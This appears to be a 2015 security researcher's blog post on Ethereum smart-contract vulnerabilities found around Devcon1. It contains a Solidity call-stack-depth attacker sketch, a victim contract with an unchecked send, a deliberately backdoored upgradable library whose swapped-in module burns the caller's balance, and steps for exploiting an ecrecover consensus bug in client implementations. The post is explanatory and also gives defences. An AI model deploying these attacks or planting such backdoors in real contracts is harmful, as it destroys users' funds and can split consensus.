Devcon1

A few months ago, in November 2015, I was on-site in London for the Ethereum developer conference, Devcon1, courtesy of the Ethdev team as a reward for my bounty submissions.

It was an awesome conference, both for the talks themselves and the discussions with different individuals in the community. I was only able to attend the first three days, which were the most tech-oriented.

One of the people I talked to was Piper Merriam, developer of the Ethereum Alarm Clock. The alarm clock, which in my opinion might be better named “Ethereum Crontab” since it is not an actual alarm clock, is a service which can be used to schedule regular contract invocations.

In order to do so, it faces a few challenges: incentivizing callers, for one, and handling callee behaviour, for another. One thing that struck me, and that we talked about, is the old “stack-depth” attack.

Call stack attack

The ‘call stack’ attack was, to the best of my knowledge, first outlined by Least Authority in their security audit of Ethereum. Their analysis can be found here.

This is also known as the “shallow stack attack” or simply “stack attack”. To be precise, though, the word “stack” on its own refers to something else within the EVM (the operand stack), not to be confused with the call stack. There is a limit on how deeply contracts can call other contracts, currently set to 1024. If a contract invokes another contract (via either CALL or CALLCODE), the operation will fail if the call stack depth limit has been reached. The failure is signalled to the caller by a 0 being pushed onto the (regular) stack.

This behaviour makes it possible to subject a contract to a “call stack attack”. In such an attack, the attacker first builds up the call stack to a suitable depth, e.g. via recursive calls, and then invokes the targeted contract. If the targeted contract calls another contract, that call will fail. If the return value is not properly checked to see whether the call was successful, the consequences can be damaging.
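To make this concrete, here is a rough sketch (untested, names are made up) of what such an attacker could look like; it recurses via external self-calls to consume call stack frames before poking the target:

contract DepthAttacker {
    // Each external self-call consumes one frame of the call stack.
    // The attacker picks `depth` so that the victim ends up just below
    // the 1024 limit, where any further CALL it attempts will fail.
    function attack(address target, uint depth) {
        if (depth > 0) {
            this.attack(target, depth - 1);
        } else {
            // Hypothetical entry point on the victim; see the Payout sketch below
            target.call(bytes4(sha3("pay()")));
        }
    }
}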

Within the EVM, there is no difference between send (as in send value) and call (as in invoke contract) - they’re both implemented by CALL (or CALLCODE). So, both operations could be made to fail with this attack.
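For illustration, here is a hypothetical victim of the sketch above; the unchecked send is the weak spot:

contract Payout {
    address beneficiary;
    bool paid;

    function Payout(address _beneficiary) {
        beneficiary = _beneficiary;
    }

    function pay() {
        if (paid) throw;
        paid = true;
        // If this executes at call stack depth 1023, the send fails silently,
        // but `paid` has already been set -- the beneficiary can never be paid
        beneficiary.send(this.balance);
    }
}

Checking the return value of the send (as in the Sharer example further down) would prevent this.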

In order to fully understand this issue, I created some sample code in Solidity, a contract which calls a library:

library x{
    function foo();
}
contract Ballot {
    function y(){
        x(0).foo();
    }
}

This produces the following runtime code:

60606040526000357c010000000000000000000000000000000000000000000000000000000090048063a56dfe4a146037576035565b005b604260048050506044565b005b600073ffffffffffffffffffffffffffffffffffffffff1663c2985578604051817c010000000000000000000000000000000000000000000000000000000002815260040180905060006040518083038160008760325a03f2156002575050505b56

The relevant part (disassembled and annotated):

CALLCODE             x(0).foo() ; F2      // Invoke method
ISZERO               x(0).foo() ; 15      // Check top stack value
PUSH [ErrorTag]      x(0).foo() ; 60 02   // If 0, push bad destination ...
JUMPI                x(0).foo() ; 57      // ...and make illegal jump

Conclusion:

  • The CALLCODE instruction will, in the stack-depth-fail case, put a 0 on the stack to signal the error.
  • The next instruction, ISZERO, converts the 0 on top of the stack into a 1.
  • Next, [ErrorTag] (value 02) is pushed; this is not a valid JUMPDEST.
  • JUMPI jumps to [ErrorTag] if the condition (the ISZERO result) is non-zero, causing an invalid jump, which reverts the entire call.

From YP (p 11):

This states that the execution is in an exceptional halting state if there is insufficient gas, if the instruction is invalid (and therefore its δ subscript is undefined), if there are insufficient stack items, if a JUMP/JUMPI destination is invalid, or if the new stack size would be larger than 1024.

The consequence is that this behaves much like an out-of-gas exception, rolling back the entire call (and, if it happens at the top level, the entire transaction).

It seems that checking the call stack depth is not necessary for contracts written in Solidity, since the Solidity compiler inserts guards that protect against this. Serpent contracts, on the other hand, appear to need explicit guarding against this behaviour (I have not tested it, but it is stated in the documentation).

TL;DR: Solidity contracts need not worry about call stack attacks on contract invocations; Serpent contracts may need to.

So how about send?

A Solidity-contract to send Ether:

contract Sender {
    function y(){
        address x = 0;
        x.send(4919);
    }
}

Relevant code:

CALL             x.send(4919)
SWAP4            x.send(4919)

For x.send(...), Solidity does not place guards around the CALL, so in this instance protection needs to be added manually. An example from the Solidity tutorial:

contract Sharer {
    function sendHalf(address addr) returns (uint balance) {
        if (!addr.send(msg.value/2))
            throw; // also reverts the transfer to Sharer
        return this.balance;
    }
}

Alternatively, a call stack depth check at the beginning of the function could be used to ensure that the call can be performed.
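One possible shape of such a guard (a sketch of my own, untested, and not the library mentioned below) is to probe for a free call stack frame before doing anything irreversible:

contract StackGuarded {
    // Does nothing; exists only so we can probe for a free call stack frame
    function probe() {}

    function withdraw() {
        // If this self-call fails, we are already at the depth limit and the
        // send below would fail silently as well -- bail out instead
        if (!address(this).call(bytes4(sha3("probe()")))) throw;
        if (!msg.sender.send(this.balance)) throw;
    }
}

A successful probe only proves that one more frame is available, but that is enough for a single subsequent call made at the same depth.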

Piper Merriam has created a library which can be used for this. I also created an EIP proposing a CALLDEPTH opcode for the EVM - I don’t know if it will be implemented; I’m guessing it won’t be unless it gets included in Homestead, which will necessitate a hard fork anyway.

Malicious libraries

Thinking about contract security, and the recent addition of libraries in Solidity, it is worth considering whether libraries introduce any security vulnerabilities for callers.

A library is just an ordinary contract within the EVM. The difference is that instead of invoking the library as a separate contract, the caller executes the library’s code within its own context: storage, balance and address all belong to the caller, not the callee. I wrote about this a while back (Quirk #3); it’s based on the CALLCODE operator. This is how it’s used:

library Library{
    function add(uint x, uint y) returns (uint);
}

contract MyContract{

    address lib_address;
    uint x;

    function MyContract(address lib){
        lib_address = lib;
        x = Library(lib).add(1, 1);
    }
}

The library keyword tells the Solidity compiler to use CALLCODE instead of CALL. I decided to see if I could construct a scenario where a library is backdoored (though not in a totally obvious way).

Construction of a malicious library

First of all, let’s define a seemingly benign library which utilizes submodules to provide functionality.

/** This is the interface of the Module Registry, which keeps track 
of the actual implementation of each function. Note that it is a plain
contract, not a library, since lookups read the registry's own storage **/

contract MathModulesRegistry{
    function get_module(uint module) constant returns(address);
}

/* The trigonometry library interface */
library Trig_lib{
    function cosine(uint arg) constant returns(uint);
}

/* The Math contract */
contract Math{
    //This is a compile-time constant which must point to the 
    // math-registry of submodules
    uint constant MATH_REGISTRY_ADR = 0x692a70d2e424a56d2c6c27aa97d1a86395877b3a;
    
    /**
     * Below are math functions
     **/
     
    function cosine(uint n) constant returns (uint) {
        // First, we need to obtain a reference to the Trigonometry module by 
        // invoking the registry as a contract (plain CALL), since it uses its own storage
        address trig_module = MathModulesRegistry(MATH_REGISTRY_ADR).get_module(0);

        //Dispatch to the trig library
        //Now, we make a `callcode` invocation of it
        return Trig_lib(trig_module).cosine(n);
    }
    /*
     * More math-functions below, all invoking different submodules
     */
}

As you can see, it provides cosine. It uses the registry to get the address of the concrete cosine implementation, and then dispatches to it via CALLCODE (since Trig_lib is declared as a library).

The registry looks like this:

contract MathModulesRegistry{
    
    mapping (uint => address) modules;
    address admin;
    
    function MathModulesRegistry(address owner){
        admin = owner;
    }
    /*
     * Admin function to set module, for patch/update of modules
     */
    function set_module(address addr, uint module){
        if(msg.sender == admin){
          modules[module] = addr;  
        } 
    }
    /*
     * Returns address for the relevant submodule
     * Not a library function, must be called using `call`
     * Since it uses the contract storage for lookup
     * @param module
     * 0 : Trigonometry
     * 1 : Complex
     * 2 : Float
     * 3 : Conversion
     */
     
    function get_module(uint module) constant returns (address){
        return modules[module];
    }
}

As you can see, the admin can replace a module with a new version. Here is the first iteration:

/* The trigonometry contract
*/
contract Trig{
    function cosine(uint arg) constant returns(uint){
        //Close enough in many cases
        // Anyway, the admin will update the MathLib later on 
        // with a more accurate version
        return 42;
    }
}

Obviously, building a math lib takes a few iterations, so the creator made it possible to update the submodules and make them better.

In a scenario such as the above, however, it would be trivial to replace the Trig module with something like this:

contract Burner{
    function(){
        // Executed via CALLCODE, so `this` is the calling contract:
        // this sends the caller's entire balance to the zero address
        address(0).send(this.balance);
    }
}

A contract which will burn all of the caller’s funds.

So, if you are using libraries, you had better make sure there are no dynamic parts which can be swapped out in later versions. Since I believe such upgrade patterns will be pretty common, you are better off not invoking them as libraries but as contracts (that is, CALL instead of CALLCODE), keeping your own storage and balance to yourself. A sketch of that variant follows below.
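As a rough sketch (hypothetical names, untested), the caller-side variant looks like this: declare Math as a contract interface instead of a library, so the compiler emits CALL rather than CALLCODE:

/* Math declared as a contract interface instead of a library: invocations
   now use CALL, so Math -- and whatever submodule it dispatches to -- runs
   in its own context and cannot touch the caller's storage or balance */
contract MathContract {
    function cosine(uint n) constant returns (uint);
}

contract MyCaller {
    function foo(address math) constant returns (uint) {
        // Worst case, a backdoored submodule returns garbage values;
        // it can no longer burn MyCaller's funds
        return MathContract(math).cosine(60);
    }
}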

Consensus bug bounty

One talk which I really enjoyed was Joseph Chow’s talk about BTCRelay. I was a bit curious how it worked, since I know the opcodes pretty well and did not understand how verification of Bitcoin PoW was performed. While looking into that, I noticed that I had glossed over the precompiled contracts part of the EVM.

There are four precompiled contracts, and they work just like any other contract. They are:

  1. the elliptic curve public key recovery function (ECDSARECOVER),
  2. the SHA2 256-bit hash scheme,
  3. the RIPEMD 160-bit hash scheme,
  4. and the identity function.

The difference is that their gas cost is fixed. To use one of them, simply invoke the defined address, e.g. ecdsa_recover at address 1.
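In Solidity you rarely call these addresses by hand: the built-ins ecrecover, sha256 and ripemd160 compile down to calls to the precompiles at addresses 1, 2 and 3. A minimal sketch:

contract RecoverExample {
    // ecrecover() below ends up as a CALL to the precompile at address 0x01,
    // paying its fixed gas cost; it returns the address that signed hash h
    function signer(bytes32 h, uint8 v, bytes32 r, bytes32 s) constant returns (address) {
        return ecrecover(h, v, r, s);
    }
}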

I checked out the Yellow Paper for details, and one thing stood out:

Importantly in the case of an invalid signature (ECDSARECOVER(h, v, r, s) = ∅), then we have no output.

Then I started skimming the client code. Here’s how the Python version looked:

def proc_ecrecover(ext, msg):
    # print('ecrecover proc', msg.gas)
    OP_GAS = opcodes.GECRECOVER
    gas_cost = OP_GAS
    if msg.gas < gas_cost:
        return 0, 0, []
    b = [0] * 32
    msg.data.extract_copy(b, 0, 0, 32)
    h = b''.join([ascii_chr(x) for x in b])
    v = msg.data.extract32(32)
    r = msg.data.extract32(64)
    s = msg.data.extract32(96)
    if r >= bitcoin.N or s >= bitcoin.P or v < 27 or v > 28:
        return 1, msg.gas - opcodes.GECRECOVER, [0] * 32
    recovered_addr = bitcoin.ecdsa_raw_recover(h, (v, r, s))
    if recovered_addr in (False, (0, 0)):
        return 1, msg.gas - gas_cost, []
    pub = bitcoin.encode_pubkey(recovered_addr, 'bin')
    o = [0] * 12 + [safe_ord(x) for x in utils.sha3(pub[1:])[-20:]]
    return 1, msg.gas - gas_cost, o

There are two failure cases here, and one success case.

Failure-case 1:

    if r >= bitcoin.N or s >= bitcoin.P or v < 27 or v > 28:
        return 1, msg.gas - opcodes.GECRECOVER, [0] * 32

Failure-case 2:

    if recovered_addr in (False, (0, 0)):
        return 1, msg.gas - gas_cost, []

So, obviously, Failure-case 1 violates the YP by returning 32 zero bytes instead of an empty output. (Incidentally, Gustav Simonsson then found another issue within the two LOC of Failure-case 1. Can you?)

Here’s the C++ code:

void ecrecoverCode(bytesConstRef _in, bytesRef _out)
{
	struct inType
	{
		h256 hash;
		h256 v;
		h256 r;
		h256 s;
	} in;

	memcpy(&in, _in.data(), min(_in.size(), sizeof(in)));

	h256 ret;
	u256 v = (u256)in.v;
	if (v >= 27 && v <= 28)
	{
		SignatureStruct sig(in.r, in.s, (byte)((int)v - 27));
		if (sig.isValid())
		{
			try
			{
				Public rec = recover(sig, in.hash);
				if (rec)
					ret = dev::sha3(rec);
				else
					return;
			}
			catch (...) { return; }
		}
	}

	memset(ret.data(), 0, 12);
	ret.ref().copyTo(_out);
}

A bit less trivial to spot… Curiously, it behaves much like the Python version, but for a completely different reason. If the (v >= 27 && v <= 28) check fails, it skips the recovery entirely, but then still copies the zero-initialized ret to the output.

A flaw such as this would not immediately trigger a consensus issue; in order to exploit it, an attacker needs to

  1. Fill a chunk of memory with non-zero data,
  2. Set that chunk of memory as the return area,
  3. Invoke ecdsa_recover with an invalid v value,
  4. Which will zero the memory in C++/Python, but not in Go,
  5. Do something that makes the difference observable, e.g. consume gas depending on the memory contents, or write them to storage.

The flaw got me another 5000 points on the bug bounty, to a total of 22500 points.

2015-12-30
